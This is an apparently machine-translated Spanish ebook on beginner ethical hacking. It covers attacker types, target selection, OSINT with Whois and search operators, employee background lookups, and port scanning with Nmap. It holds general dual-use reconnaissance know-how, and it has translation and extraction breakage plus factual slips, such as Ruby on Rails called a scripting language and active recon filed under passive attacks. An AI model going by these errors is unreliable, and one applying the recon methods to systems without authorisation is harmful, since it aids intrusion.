Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 93

Hackear

Guía para principiantes y expertos en piratería informática, seguridad básica y

Pruebas de penetración

Por James Patterson


Introducción

Quiero agradecerte y felicitarte por descargar el libro, "Hacking: Guía para principiantes sobre piratería informática, seguridad
básica y pruebas de penetración. "

Este libro le enseñará cómo puede protegerse de los ataques de piratería más comunes, ¡al saber cómo funciona realmente la piratería!
Después de todo, para evitar que su sistema se vea comprometido, debe mantenerse un paso por delante de cualquier hacker criminal.
Puede hacerlo aprendiendo cómo hackear y cómo hacer un contraataque.

Dentro de este libro hay técnicas y herramientas que son utilizadas por piratas informáticos criminales y éticos: todo lo que encontrará aquí le
mostrará cómo se puede comprometer la seguridad de la información y cómo puede identificar un ataque en un sistema que está tratando de
proteger. . Al mismo tiempo, también aprenderá cómo puede minimizar cualquier daño en su sistema o detener un ataque continuo.

Gracias de nuevo por descargar este libro. ¡Espero que lo disfruten!


Tabla de contenido

Introducción

Tabla de contenido

Capítulo 1: Hackear 101

¿Quién piratea?

¿Hackear para todos? Lo

que obtendrás aquí

¿Es difícil de aprender y entender? Habilidades

que necesitas tener

Capítulo 2: Cómo los hackers encuentran sus objetivos

Cosas que los hackers buscan para establecer

un plan de piratería Estableciendo objetivos

Capítulo 3: Mapeando tus Hacks

Organizando tu proyecto

¿Cuándo deberías comenzar a hackear? ¿Qué

ven los demás? Asignación de escaneos del

sistema de red haciendo

Una mirada a las vulnerabilidades del sistema

Capítulo 4: Acerca de los ataques

¿Qué es un ataque pasivo? ¿Qué es

un ataque activo? Capítulo 5:

Herramientas de piratería

Capítulo 6: Cómo engañar a los objetivos

Spoofing

Man-in-the-Middle Attacks Capítulo

7: Hackear contraseñas

Cómo descifrar contraseñas Notas sobre el cifrado de

contraseñas Otras formas de descubrir contraseñas

Capítulo 8: Hackear conexiones de red

Hackear una conexión WEP The

Evil Twin Hack


Capítulo 9: Introducción a la piratería móvil

Hackear aplicaciones móviles

Explotación remota de un dispositivo móvil

Capítulo 10: Ingeniería social

Ingeniería social como arte y ciencia Cómo sucede la

ingeniería social Tipos de ataques de ingeniería social

Qué puede hacer contra la ingeniería social Capítulo 11:

Ataques físicos

Por qué los ataques físicos funcionan

Descubriendo vulnerabilidades Asegurando

la periferia Conclusión
Capítulo 1: Hackear 101

Cada vez que te encuentras con la palabra hackear, probablemente lo asocie con enviar un programa encriptado a otro usuario y luego
poder obtener acceso no autorizado en una computadora remota.

Sin embargo, el término hackear se utilizó para definir cualquier acto de retocar el hardware o software de una computadora que no sea su uso previsto,
con el fin de mejorarlo y descubrir cómo los dispositivos electrónicos pueden funcionar electrónicamente.

Si bien esa definición técnicamente aún es cierta, la piratería definitivamente ha dado un giro completamente nuevo, especialmente cuando se trata de cómo

otra persona puede acceder a la computadora de otra persona. Antes de pensar que la piratería se trata de hacer que los valores pasados ​causen estragos en el

dispositivo digital de otra persona, es posible que necesite conocer los tipos de piratas informáticos que existen hoy en día.
¿Quién piratea?

Los hackers generalmente se dividen en las siguientes categorías:

1. Hackers de sombrero negro

También conocidas como hackers o crackers criminales, estas personas son aquellas que obtienen acceso malicioso al sistema de otra persona para obtener

ganancias egoístas. Por lo general, piratean dispositivos electrónicos y modifican, roban o eliminan archivos críticos para su beneficio personal.

2. hackers de sombrero blanco

Los hackers de sombrero blanco, o hackers éticos, descubren formas de cómo se puede explotar el sistema de un dispositivo para aprender
cómo las personas pueden defenderse de posibles ataques. Estos hackers éticos también señalan que los servicios de seguridad que emiten
están actualizados. Lo hacen al estar atentos y cavando activamente los nuevos exploits y las nuevas vulnerabilidades del sistema.

Los hackers éticos también señalan que descubren nuevas formas de aprender cómo se puede manipular un dispositivo electrónico para maximizar su
eficiencia. Por esta razón, construyen comunidades que les permiten obtener sus conocimientos de manera colectiva para mejorar la forma en que las
personas usan sus dispositivos.

3. hackers de sombrero gris

Como su nombre indica, están motivados por motivaciones de piratería de sombrero blanco y negro: son los que emplean técnicas legales e ilegales
para explotar o mejorar un sistema. Sin embargo, si un pirata informático de sombrero gris explota el sistema de otra persona, por lo general hace un
punto para informar al propietario de los exploits realizados y luego ofrece sugerencias sobre qué se puede hacer para mejorar la seguridad del sistema.

Una vez que pueda identificar a los piratas informáticos con los que es probable que se encuentre, podrá conocer la motivación que tienen para
hackear y los tipos de piratas informáticos con los que es probable que se encuentren.
¿Hackear para todos?

Si bien la piratería se atribuye típicamente a personas que saben cómo codificar, todos pueden aprender a piratear. Al mismo tiempo, también
es mejor tener en cuenta que no hay una única forma de aprender a hackear: los hacks para mejorar o atacar sistemas se crean a través de la
evolución continua del conocimiento del usuario sobre cómo debe funcionar un sistema. Mientras lee esto, puede contar con esa posibilidad de
que ya se haya creado una nueva forma de proteger o atacar un dispositivo o una red.

Si tienes una computadora o un teléfono móvil, entonces eres el mejor candidato para ser un hacker. Tiene la motivación correcta para
aprender a jugar con un sistema y mejorar la forma en que lo usa. Dado que se conecta con otros usuarios a través de descargas,
mensajes, compras en línea o cargas, debe prestar especial atención a cómo puede asegurar su propio sistema. Para hacer esto, debe
aprender cómo piensa un pirata informático de sombrero negro, comenzando por la motivación que tiene para atacar un sistema, hasta los
rudimentos de un ataque. A partir de ese momento, comprenderá que tiene muchas medidas preventivas cuando se trata de detener una
intrusión no autorizada e incluso lanzar un contraataque.
Lo que obtendrás aquí

Este libro le informará sobre las estrategias comúnmente utilizadas por los hackers de sombrero negro, que le permitirán probar las vulnerabilidades
de su propio sistema y cómo puede caer en diferentes trampas que se presentan para la mayoría de los usuarios. Aquí, aprenderá cómo las personas
se convierten en candidatos para convertirse en víctimas potenciales de piratas informáticos criminales y cómo puede protegerse de tales ataques. En
este punto, se le ocurre la idea: está en camino de convertirse en un hacker ético.

Dado que su principal preocupación es su propia seguridad y, por lo tanto, entenderá por qué los ataques pasan por diferentes sistemas, también
necesitará aprender cómo se realizan los ataques en primer lugar. Podrá descubrir cómo los hackers criminales penetran en los dispositivos
mediante el aprendizaje de herramientas, técnicas y ataques que utilizan en su comercio.

Una vez que comprenda cómo un dispositivo electrónico puede verse comprometido, tendrá una mejor idea de lo que puede hacer para evitar
que eso suceda.
¿Es difícil de aprender y entender?

Si bien el pirateo requiere mucha práctica, no es un oficio difícil de realizar. Mientras sepa cómo usar una computadora y pueda
seguir las instrucciones que encontrará en este libro, puede probar o incluso realizar hacks que leeré en los capítulos posteriores.

Si aún no sabe cómo codificar, no se preocupe, encontrará instrucciones detalladas sobre qué software de codificación, sistema operativo y otros
más adelante. Sin embargo, si desea sobresalir en la piratería y desea desarrollar sus propias medidas de seguridad o probar una versión de un
ataque, entonces debe tener habilidades de codificación.
Habilidades que necesitas tener

Para convertirse en un buen hacker ético, debe tener las siguientes habilidades:

1. Habilidades informáticas intermedias

Esto significa que necesita tener habilidades que vayan más allá de crear un documento de Word o poder navegar en la web. Para ser un hacker,
debes saber cómo usar diferentes líneas de comando de Windows, configurar una red o editar el registro de tu computadora.

2. Buenas habilidades para establecer contactos

Dado que muchos, si no la mayoría, de los ataques de piratas informáticos se realizan en línea, debe dominar los conceptos y términos de redes, como:

WEP contra las contraseñas WPS NAT

Direcciones MAC

Enrutadores Puertos

VPN IPv6 DNS

Subred

DHCP

IP privadas y públicas IPv4

Paquetes de

modelado OSI TCP /

IP

3. Usando un sistema operativo Linux

Casi todos los piratas informáticos tendrán que usar el sistema operativo Linux porque permite programas y ajustes que no son posibles en los sistemas

operativos Windows y Mac. Casi todas las herramientas de hackeo que puedes encontrar también hacen uso de este sistema operativo.

4. Virtualización
Antes de intentar probar un ataque en un sistema en vivo, debe asegurarse de saber lo que está haciendo. Para asegurarse de que está
haciendo las cosas bien, puede probar primero un hack en un paquete de software de virtualización, como la estación de trabajo
VMWare. El uso de estaciones de trabajo virtuales le proporcionará un entorno seguro para sus pruebas de pirateo y evitará que
provoque daños involuntarios en su propio dispositivo.

5. Tcpdump o Wireshark

El tcpdump se conoce como un analizador de protocolo de línea de comandos o un sniffer, mientras que Wireshark es conocida como la herramienta más popular

disponible que realiza la misma función.

6. Conocimiento de las tecnologías y conceptos de seguridad.

Cualquier hacker debería poder comprender los conceptos y tecnologías más importantes relacionados con la tecnología de la información. Por este
motivo, debe estar familiarizado con la tecnología y los conceptos inalámbricos, como la Capa de sockets seguros (SSL), los firewalls, el Sistema de
detección de intrusiones (IDS), la Infraestructura de clave pública (PKI), etc.

7. Habilidades de secuencias de comandos

Tener la capacidad de crear y editar scripts le permite crear sus propias herramientas y lograr ser independiente de las herramientas desarrolladas
por otros hackers. Al poder construir sus propias herramientas, se permite desarrollar mejores defensas a medida que los hackers criminales crean
mejores hacks. Para hacer esto, debe convertirse en un profesional en el uso de al menos uno de los lenguajes de secuencias de comandos de uso
común, como Ruby on Rails o Python.

8. Habilidades de base de datos

Si desea comprender cómo los hackers se infiltran en las bases de datos de su sistema, debe asegurarse de que sepa cómo funcionan las bases de
datos. Esto significa que necesita dominar un sistema de gestión de bases de datos como Oracle o MySQL.

9. Ingeniería inversa

La ingeniería inversa le permite convertir una pieza de malware o exploit similar en una herramienta de piratería más avanzada. Con esta
habilidad, se comprende que casi todos los exploits realizados por piratas informáticos provienen de otros exploits existentes: una vez que
comprenda cómo funciona un malware o una característica de exploit, comprenderá mejor cómo funcionan otros hacks contra un sistema.

10. Criptografía

La criptografía, como habilidad, le permite comprender cómo los hackers ocultan actividades y cubren sus huellas mientras realizan hacks. También
le ayuda a comprender las fortalezas y debilidades de los diferentes algoritmos utilizados para descifrar información personal, como las contraseñas
almacenadas.
Capítulo 2: Cómo los hackers encuentran sus objetivos

Los hackers criminales se encuentran probablemente entre los investigadores más estratégicos que encontrarás en el mundo tecnológico. Para que un pirata
informático obtenga la mayor cantidad de datos valiosos que pueda en un solo lanzamiento de ataque, espera a que aparezca la víctima perfecta en su barrido,
estudia a su presa y luego diseña el mejor ataque que pueda reunir a partir de su habilidad. conjunto.

Un ataque de sombrero negro puede apuntar a una sola persona o varias personas a la vez, pero la mayoría de las veces, un hacker opera en un nicho
en particular. Hay hackers que desearían encontrar vulnerabilidades en los sistemas bancarios en línea porque les proporcionará acceso a millones de
depósitos que pueden filtrar a través de sus sistemas. Algunos valoran la información personal y proceden haciendo ataques personales. Algunos
prefieren desfigurar las páginas de destino y transmitir su capacidad para atravesar la seguridad de un sitio web. Algunos optan por hackear cuentas
para que puedan permanecer en el anonimato y utilizar los servicios sin pagar un centavo.

Cualquiera que sea la motivación del pirata informático criminal para hackear un sistema en particular, solo procederán con un ataque si
descubren que se puede hacer y que pueden obtener algo de él. Dicho esto, la mejor manera de prevenir un ataque de piratería es
mantener la información valiosa del público tanto como sea posible. Si bien compartir información se considera casi una necesidad hoy en
día, debe asegurarse de compartir datos solo con usuarios legítimos.
Cosas que los hackers buscan

Por un momento, entra en la mente de un hacker criminal. Si desea robar información o comprometer un sistema, sabe que
puede obtener valor de lo siguiente:

1. Diseño de la organización, presentaciones y registros.

Los piratas informáticos maliciosos suelen realizar una búsqueda en línea para buscar posibles objetivos, y entre los mejores candidatos para un ataque se
encuentran aquellas organizaciones que proporcionan descripciones detalladas de los dispositivos a los que tienen acceso, incluido el tipo de software y
hardware que han instalado. Una vez que los hackers saben que cierta persona tiene acceso a un punto posiblemente vulnerable en la seguridad
tecnológica de una organización, tienen una idea de a quién deberían piratear primero.

Cualquier hacker puede obtener esta información extremadamente útil con una simple búsqueda en línea. Al excavar en línea, puede encontrar todos los registros

SEC, licitaciones públicas, archivos de acceso público, suscriptores y muchos más. Incluso puede buscar todas las personas involucradas en una organización en

particular, el momento en que se publica un sitio web y el webmaster involucrado en la creación de seguridad web para una organización. Tener ese conocimiento

puede ayudar fácilmente a un pirata informático a prepararse para un ataque masivo en línea que puede destruir el sitio web y la base de datos de toda una

organización.

2. Suscripciones y pagos

Los piratas informáticos tienen más probabilidades de piratear dispositivos y cuentas propiedad de una persona que realiza pagos o compras en línea. Dado que los

teléfonos inteligentes, los correos electrónicos y los sistemas de pago en línea contienen una gran cantidad de información personal, incluidas tarjetas de crédito y

extractos bancarios, la piratería de estos sistemas hace que sea fácil para todos los piratas informáticos delincuentes lograr el robo de identidad.

3. Cuentas de redes sociales

Si bien algunos pueden decir que posiblemente no haya nada valioso en una cuenta personal de Facebook, poder acceder a las cuentas de las redes
sociales también permite que un hacker obtenga acceso a otros datos personales, como contraseñas, correos electrónicos y números de teléfonos móviles.

4. Correos electrónicos

Los correos electrónicos sirven como el centro de su información personal porque sirve como un punto de control para todas sus contraseñas, cuentas
de pago en línea, entre otros.

5. Contraseñas

Muchos piratas informáticos realizan un ataque para predecir, espiar o suplantar la contraseña de un usuario. Una vez que
son capaces de encontrar una sola contraseña, están casi seguros de que un usuario puede usarla para diferentes cuentas o usar una variación de ella para otros

inicios de sesión.

6. Hardware físico

Es más fácil robar información cuando tiene acceso físico a un dispositivo como un teléfono inteligente o una computadora personal. Puede
verificar fácilmente todas las cuentas accedidas a través del registro, el historial del navegador o las contraseñas guardadas sin siquiera tener que
usar un código. Al mismo tiempo, tener acceso físico a un dispositivo también le permite hacer posible plantar un dispositivo de escucha en su
sistema para suplantar cualquier información adicional en cualquier momento en el futuro.

7. Ubicaciones objetivo

Si un pirata informático aún no puede encontrar ninguna vulnerabilidad en un sistema que quiere piratear, lo siguiente que intentará encontrar es dónde está un

sistema informático. Esto le permitirá estudiar más a fondo las vulnerabilidades a través de la ingeniería social, el buceo en contenedores o incluso obtener

acceso físico a un dispositivo específico.

Dado que todas las computadoras tienen una dirección MAC, y todos los dispositivos conectados a través de Internet tienen una dirección IP,
se puede buscar fácilmente en todos los dispositivos del mundo para averiguar dónde se encuentra. Un hacker, por otro lado, sabe cómo
ocultar su ubicación para no ser detectado mientras lanza un ataque.
Establecer un plan de piratería

Cuando desea proteger su propio sistema, necesita saber dónde puede ser atacado por un hacker. Eso significa que para
atrapar a un ladrón, debes pensar como tal.

Ahora que tiene una idea de lo que puede estar buscando un pirata informático cada vez que realiza un barrido, ya sabe dónde comenzar a crear
sus puntos de seguridad y dónde debe probar las vulnerabilidades.

En este punto, tiene una idea de por qué un hacker en particular puede identificar a una organización, individuo o dispositivo solitario en particular como objetivo.

Cualquier hacker inteligente apuntaría a las siguientes vulnerabilidades:

1. Un usuario o cuidador que posiblemente dejaría desatendido el dispositivo objetivo

2. Contraseñas débiles o sin cambios que posiblemente se utilizan en todos los dispositivos sincronizados

3. Propietarios de dispositivos que desconocen la complejidad de su propio sistema o que no están actualizados con los protocolos de seguridad

Cuando piensa en cómo se administran las computadoras y la conectividad a Internet, tiene la idea de que la mayoría de los
sistemas que utiliza a diario no están tan seguros como desea. Los hackers lo saben y, por esa razón, pueden estar seguros de que
hay ciertos puntos de conectividad que no se controlan en absoluto o de que hay ciertos puntos en un firewall que pueden ser
fácilmente violados sin ser detectados. También es fácil para todos los piratas informáticos explotar un entorno que desean atacar,
especialmente cuando saben que pueden obtener acceso completo sin alertar a los administradores.

Una vez que un hacker criminal descubre la vulnerabilidad, no puede esperar que un hacker se la guarde. Todos los hackers son capaces de conectarse en
red para transmitir sus actividades y obtener el apoyo de otros dentro de la comunidad. Debido a que la mayoría de los administradores de sistemas y los
equipos de TI comunes no se dan cuenta de cuándo está a punto de ocurrir un ataque o cuál es realmente la vulnerabilidad de su sistema, los piratas
informáticos criminales tienen la libertad de ganar tiempo para estudiar cuál será el ataque más útil. Dado que los atacantes criminales plantan sus ataques,
se mueven muy lentamente para evitar ser detectados y se lanzan durante el tiempo más vulnerable, también debe crear un plan de piratería ética que
funcione para evitar cualquier ataque.
Establecer metas

Debe establecer sus propios objetivos de piratería descubriendo las vulnerabilidades de su propio sistema para establecer la seguridad suficiente
para protegerlos de los ataques. Como te enfrentas a un enemigo muy astuto, debes establecer objetivos y cronogramas muy específicos sobre
cuándo puedes comenzar a hackear tu propio sistema.

Nota IMPORTANTE: Tenga en cuenta que antes de crear un plan, debe asegurarse de tener todas las credenciales para probar
los sistemas. También asegúrese de documentar el pirateo ético y el sistema que probó, y proporcione una copia de la
documentación a la administración. Esto asegurará que tenga la protección que necesita en caso de que descubra que un
sistema está comprometido o cuando sucede algo inesperado en su investigación.

Si está probando su propio sistema, es imprescindible documentar todo, incluidas todas las periferias de software que ha
probado y el tipo de pruebas que realizó. Esto asegurará que ha seguido todos los pasos correctamente, y si necesita volver
sobre sus pasos, tiene una idea de a dónde debe regresar.

Una vez que pueda seguir todos los protocolos de seguridad necesarios, hágase las siguientes preguntas:

1. ¿Qué tipo de información en su sistema debe proteger más?

Debe determinar qué parte de su sistema es más importante para usted. Si tiene una base de datos de información personal o un archivo
de un proyecto importante que a muchos les gustaría tener en sus manos, entonces tiene sentido que proteja esos archivos primero.

2. ¿Cuál es su presupuesto para la piratería ética?

Si bien existen numerosas herramientas gratuitas en línea que le permitirán realizar pruebas y ataques informáticos, la cantidad de tiempo, dinero y
esfuerzo que puede dedicar a sus ataques informáticos determinará qué tipos de herramientas puede utilizar para proteger sus sistemas e investigar
posibles vulnerabilidades. . Con esto en mente, tiene la idea de que si valora el tiempo y el esfuerzo, necesita tener el presupuesto adecuado para comprar
herramientas de hackers éticos de primera línea.

3. ¿Qué quieres obtener de tus pruebas de piratería?

Si una organización lo contrata como hacker ético, debe determinar qué tipo de justificación debe presentar a la gerencia para
lograr los mejores resultados posibles de su investigación.
Capítulo 3: Mapeando tus Hacks

Cuando busca vulnerabilidades, no necesita verificar todos los protocolos de seguridad que ha instalado en todos sus dispositivos al
mismo tiempo; hacerlo no solo será muy confuso, sino que también puede causar algunos problemas, ya que también tendrá mucho
en tu plato. Siempre que sea posible, haga posible que sus pruebas sean manejables dividiendo el proyecto de prueba en pasos más
procesables.

Para que le resulte más fácil decidir qué sistemas deben ir primero, hágase las siguientes preguntas:

1. ¿Qué sistemas, cuando son atacados, causarían más problemas o crearían las pérdidas más problemáticas?

2. ¿Qué partes de sus sistemas se ven más vulnerables a un ataque de piratas informáticos?

3. ¿Qué partes de sus sistemas están menos documentadas, rara vez verificadas o de las que apenas sabe algo?

Una vez que haya terminado de crear sus objetivos e identificado las partes más vulnerables de sus sistemas, ahora puede decidir
cuáles debe probar primero. Al conocer los resultados que desea obtener y hacer un plan procesable, puede establecer sus expectativas
correctamente y tener una buena estimación de cuánto tiempo debe realizar las pruebas y la cantidad de recursos que debe gastar en
cada prueba que realice.
Organizando tu proyecto

Estos deberían ser los sistemas, aplicaciones y dispositivos en los que debería realizar sus pruebas:

1. Servidores de correo electrónico, impresión y archivos

2. Cortafuegos

3. Base de datos, web y servidores de aplicaciones.

4. Sistemas operativos cliente / servidor

5. Tabletas, computadoras portátiles y estaciones de trabajo.

6. Interruptores y enrutadores

Ahora, la cantidad de pruebas que puede hacer dependerá de cuántos dispositivos y sistemas necesita para realizar sus pruebas. Si
tiene una red pequeña, puede probar cada periferia. Sin embargo, todo el proceso de piratería puede ser flexible y debe depender de
lo que tenga más sentido para usted.

Si tiene problemas en qué periferia o sistema debe comenzar a probar primero, considere estos factores:

1. El tipo de sistema operativo o aplicaciones se ejecuta en su sistema

2. Clasificación y cantidad de información crítica almacenada en su sistema informático

3. Sistemas y aplicaciones que se encuentran en la red.


¿Cuándo deberías comenzar a hackear?

Cada pirateo se realiza con éxito en función del momento en que eliges lanzar un ataque de prueba. Cuando esté planificando el
cronograma para sus pruebas, asegúrese de realizarlas en horarios que causen la menor interrupción posible a otros usuarios. No desea
causar problemas al probar un ataque de denegación de servicio (DoS) durante un momento comercial crítico cuando las ventas
generalmente llegan para la organización para la que está trabajando. Tampoco desea encontrar problemas en el sistema y no poder
resolverlo justo a tiempo antes de que necesite usar su propia computadora.

Cuando programe pruebas, asegúrese de que todos los involucrados estén de acuerdo con su plan. Esto lo ayudará a establecer expectativas y también le
dará un cronograma sobre cuándo debe realizar las pruebas.
¿Qué ven los demás?

Puede obtener una mejor perspectiva sobre la vulnerabilidad de los sistemas que necesita probar al observar primero qué posibles
piratas informáticos criminales pueden estar viendo desde el exterior. Para hacer esto, debe ver qué tipo de rastros deja su sistema
cuando alguien usa su red.

Puede hacer lo siguiente para reunir esas huellas:

1. Realice una búsqueda en línea sobre la organización para la que está trabajando. Si está realizando pruebas para su sistema personal, busque
elementos relacionados con usted.

2. Realice una investigación de posibles puertos abiertos o ejecute un escaneo completo de la red para determinar los informes específicos del sistema que personas

externas pueden estar viendo sobre sus dispositivos. Dado que es el propietario del sistema que está a punto de probar, puede usar escáneres de puertos locales y

herramientas de búsqueda de recursos disponibles en Windows, como LANguard o GFI.

Después de eso, puede realizar búsquedas más específicas en línea. Intenta encontrar lo siguiente:

1. Patentes o marcas registradas

2. documentos SEC

3. Adquisiciones y fusiones anteriores.

4. Comunicados de prensa sobre las adquisiciones y los cambios más importantes en su organización.

5. Datos de contacto que apuntan a miembros de la organización o empleados. Puede hacer verificaciones de antecedentes instantáneamente
en los siguientes sitios:

1. USSeach

2. ChoicePoint

3. ZabaSearch

6. Documentos de incorporación. Puedes buscar estos utilizando sitios de negocios como


www.sec.gov/edgar.shtml (muestra las presentaciones de empresas públicas)

Aquí hay un consejo: si no puede encontrar la información que está buscando o si desea profundizar en un sitio web con una simple búsqueda de
palabras clave, realice una búsqueda web avanzada. Por ejemplo, si desea buscar archivos en un sitio web en particular, puede usar estas cadenas

sitio: www. (dominio) .com (palabra clave o nombre de archivo) - para buscar archivos específicos en un sitio web en particular

tipo de archivo: swf (empresa) _ (nombre): para buscar archivos Flash que posiblemente puedan descompilarse para obtener acceso a
información cifrada
Ahora que tiene una idea de lo que otros ven sobre lo que está tratando de proteger en línea, es hora de que comience a mapear la
red y busque las posibles vulnerabilidades de su sistema.
Mapeando la Red

Cuando desee hacer un plan sólido sobre cómo va a diseñar su plan de piratería ética, una de las primeras cosas que necesita
saber es cuánto saben otras personas sobre su red. Si bien puede pensar que tiene un anonimato completo en línea, su
computadora continuamente deja huellas que apuntan hacia usted y el sistema que está utilizando.

Para tener una mejor idea acerca de cuánta información sobre usted o su dominio está disponible para el público, puede
consultar lo siguiente:

Quien es

Whois es una herramienta en línea que puede usar para ver si un nombre de dominio está disponible. Sin embargo, también se puede usar para ver
información de registro sobre dominios existentes. Eso significa que existe una gran posibilidad de que sus direcciones de correo electrónico e información
de contacto se transmitan en línea.

Whois también proporciona información sobre los servidores DNS que utiliza su dominio y detalles sobre el soporte técnico de su proveedor de
servicios. También tiene una herramienta llamada DNSstuff, que realiza lo siguiente:

Mostrar qué hosts manejan ese correo electrónico para un dominio particular Mostrar

ubicaciones de hosts

Ver si un host en particular está en la lista negra como un host span Muestra

información general sobre el registro de un dominio.

Además de Whois, puede obtener información similar sobre diferentes dominios utilizando lo siguiente:

1) www.dot.gov - proporciona información sobre el gobierno

2) www.nic.mil - proporciona información sobre los militares

3) www.afrinic.net - proporciona información de un registro de Internet en África.

4) www.apnic.net - proporciona información sobre el registro regional de Internet de Asia Pacífico.

5. ws.arin.net/whois/index.html: proporciona información sobre el Registro de Internet en algunas partes de África subequatorial,
América del Norte y algunas áreas del Caribe.

6) www.lacnic.net/en - proporciona información sobre los registros de internet del Caribe y América Latina

7) www.db.ripe.net/whois - proporciona información sobre el registro de Internet en las regiones de África, Europa, Medio Oriente y Asia Central.

Foros y grupos de Google

Los foros y los grupos de Google proporcionan una gran cantidad de información sobre la información de la red pública, como direcciones IP, nombres de
usuario y listas de nombres de dominio completos (FQDNS). Puede buscar toneladas de publicaciones de Usenet y encontrar información privada que
quizás no sepa que se ha publicado en público, que puede incluir información altamente confidencial que puede revelar demasiado sobre las actividades de
su sistema.
Aquí hay un consejo: si sabe que tiene información confidencial publicada en línea, puede obtenerla de Internet siempre que tenga
las credenciales correctas. Todo lo que necesita hacer es comunicarse con el personal de soporte del foro del grupo o foro de
Google que publicó la información privada y presentar un informe.

Políticas de privacidad

La política de privacidad de un sitio web es una forma de permitir que las personas que utilizan el sitio se den cuenta de los tipos de información que se
recopilan de ellos y cómo se protege la información cada vez que visitan el sitio. Sin embargo, una política de privacidad no debe divulgar ninguna otra
información que pueda proporcionar ideas a los piratas informáticos sobre cómo pueden infiltrarse en un sistema.

Si está comenzando a construir su sitio web o está tratando de contratar a alguien para que escriba su política de privacidad, asegúrese de no transmitir
la infraestructura de seguridad de su red. Cualquier información sobre su firewall y otros protocolos de seguridad dará pistas a los piratas informáticos
criminales sobre cómo pueden violar su sistema.
Hacer escaneos del sistema

Una vez que sepa cómo puede recopilar activamente información sobre su red, tendrá una idea de cómo los piratas informáticos
criminales podrían lanzar un ataque contra su red. Estas son algunas de las cosas que puede hacer para ver qué tan vulnerable es su
sistema:

1. Utilice los datos que encontró en sus búsquedas de Whois para ver cómo se pueden establecer los nombres de host y las direcciones IP relacionadas. Por ejemplo,

puede verificar información sobre cómo algunos nombres de host internos, protocolos operativos, servicios en ejecución, puertos abiertos y aplicaciones se muestran

en una búsqueda en la web, lo que puede darle una idea de cómo los piratas informáticos criminales pueden infiltrarse pronto en su sistema.

2. Analice sus hosts internos y sepa a qué usuarios posiblemente no autorizados pueden acceder. Tenga en cuenta que un atacante puede provenir de
su organización y establecer una tienda en uno de sus anfitriones, lo que puede ser muy difícil de señalar.

3. Verifique la utilidad de ping de su sistema o use una utilidad de terceros que le permita hacer ping a diferentes direcciones
simultáneamente. Puede hacerlo utilizando herramientas como NetScan Tools, fping (si está utilizando Unix) o SuperScan. Si no sabe
cuál es su dirección IP de puerta de enlace, puede buscar su dirección IP pública yendo a www.whatismyip.com .

4. Realice una exploración externa de su sistema mediante la exploración de puertos abiertos. Para hacer eso, puede usar herramientas como Nmap o
Superscan, y luego verificar lo que otros pueden ver en el tráfico de su red usando herramientas como Wireshark u Omnipeek.

Al hacer este escaneo, puede tener una idea de lo que otras personas pueden ver cuando escanean su dirección IP pública y luego conectan una estación de trabajo

directamente a un concentrador o cambian el lado público de su enrutador.

Una vez que pueda escanear puertos abiertos, podrá darse cuenta de que los extraños que realizan barridos en sus puertos abiertos pueden encontrar
fácilmente la siguiente información:

Servicios de VPN que está ejecutando, como IPSec, PPTP y SSL

Servicios que se ejecutan en sus puertos, como correo electrónico, aplicaciones de bases de datos y servidores web. Requisito de

autenticación para compartir entre redes

Servicios de acceso remoto disponibles en su sistema, como Escritorio remoto, Secure Shell, VNC y Servicios de terminal de
Windows.
Una mirada a las vulnerabilidades del sistema

Una vez que pueda ver cómo las personas pueden penetrar el sistema de seguridad de su computadora, podrá descubrir a qué
atacante puede apuntar en su computadora. Si no conoce las diferentes vulnerabilidades en la mayoría de los sistemas informáticos,
puede encontrar esa información en bases de datos de vulnerabilidades como

1. Base de datos de notas de vulnerabilidad de US-CERT (kb.cert.org)

2. Vulnerabilidades y exposiciones comunes (cve.mitre.org/cve)

3. Base de datos nacional de vulnerabilidad del NIST (nvd.nist.gov)

Estos sitios web documentan todas las vulnerabilidades conocidas del sistema, lo que le permitirá realizar la evaluación correcta para su
sistema. Una vez que realice la evaluación, puede usar diferentes herramientas para administrar la gestión de vulnerabilidades.
Dependiendo de las vulnerabilidades que logró encontrar, puede usar la información que encontró sobre el sistema e identificar qué ataque
es más probable que ocurra. Estos ataques se pueden hacer para hacer lo siguiente:

1. Capture su pantalla mientras abre archivos confidenciales

2. Obtenga acceso a los archivos más valiosos o confidenciales

3. Enviar archivos o correos electrónicos como administrador

4. Detener o iniciar aplicaciones o servicios

5. Obtenga un símbolo del sistema remoto

6. Obtenga información más profunda sobre hosts y datos

7. Acceda a otros sistemas conectados

8. Deshabilitar los controles de seguridad o registros

9. Realizar ataques DoS

10) Hacer inyección SQL

11) Sube un archivo que difunda el ataque.

Ahora que sabe cómo los hackers pueden detectar vulnerabilidades en su sistema y realizar posibles ataques de acuerdo con la
información que encontraron sobre su red, es hora de que sepa cómo penetran a través de la seguridad de su sistema.
Capítulo 4: Acerca de los ataques

Cuando echas un vistazo a la mente de un hacker, puedes darte cuenta de que hay dos tipos de hackers con los que te
encontrarás: el pasivo y el activo. Conocer los tipos de ataques que realizan le permitirá prepararse para defender el sistema
que está tratando de proteger instalando el protocolo de seguridad adecuado.
¿Qué es un ataque pasivo?

Un ataque pasivo es un ataque en el que el hacker espera la oportunidad perfecta para penetrar en su sistema. Este tipo de ataque
generalmente se realiza para que un pirata informático observe su estructura de red, el tipo de software que utiliza o cualquier medida de
seguridad que ya haya instalado.

Los ataques pasivos generalmente ocurren cuando un pirata informático monitorea posibles vulnerabilidades del sistema sin realizar ningún cambio en
los datos a los que apunta. Puedes pensar en este ataque como el medio de un hacker de investigar sobre su objetivo para lanzar un ataque más
efectivo.

Los ataques pasivos se clasifican en:

1. Reconocimiento activo

Esto sucede cuando un intruso escucha directamente en un sistema objetivo atacando al objetivo para descubrir dónde están los puntos
débiles. Esto normalmente se realiza a través del escaneo de puertos, que es una táctica efectiva para averiguar dónde se encuentran los
puertos vulnerables y qué tipo de datos normalmente alojan. Después de descubrir la vulnerabilidad, un hacker puede atacar este punto
débil y explotar los servicios que están asociados con él.

2. Reconocimiento pasivo

Esto sucede cuando un hacker elige estudiar el sistema objetivo sin comprometerlo activamente, sin la intención de atacar
directamente al objetivo. Las tácticas de reconocimiento pasivo incluyen conducción de guerra (descubrimiento de una red inalámbrica
desprotegida), buceo en contenedores (encontrar datos en dispositivos o documentos descartados) o enmascarar (pretender ser un
usuario de la red con autorización)

Estas dos tácticas pueden ser herramientas esenciales cuando se trata de descubrir vulnerabilidades en su sistema
informático para permitirle evitar más ataques. Una vez que pueda usar tácticas de reconocimiento, puede identificar
fácilmente dónde están realmente los puntos débiles de su sistema informático.

Una vez que pueda identificar los puntos vulnerables mediante el uso de ataques de reconocimiento de prueba, se dará cuenta de que
la mejor y más simple manera de proteger su sistema informático de la indagación es instalar un IPS (sistema de prevención de
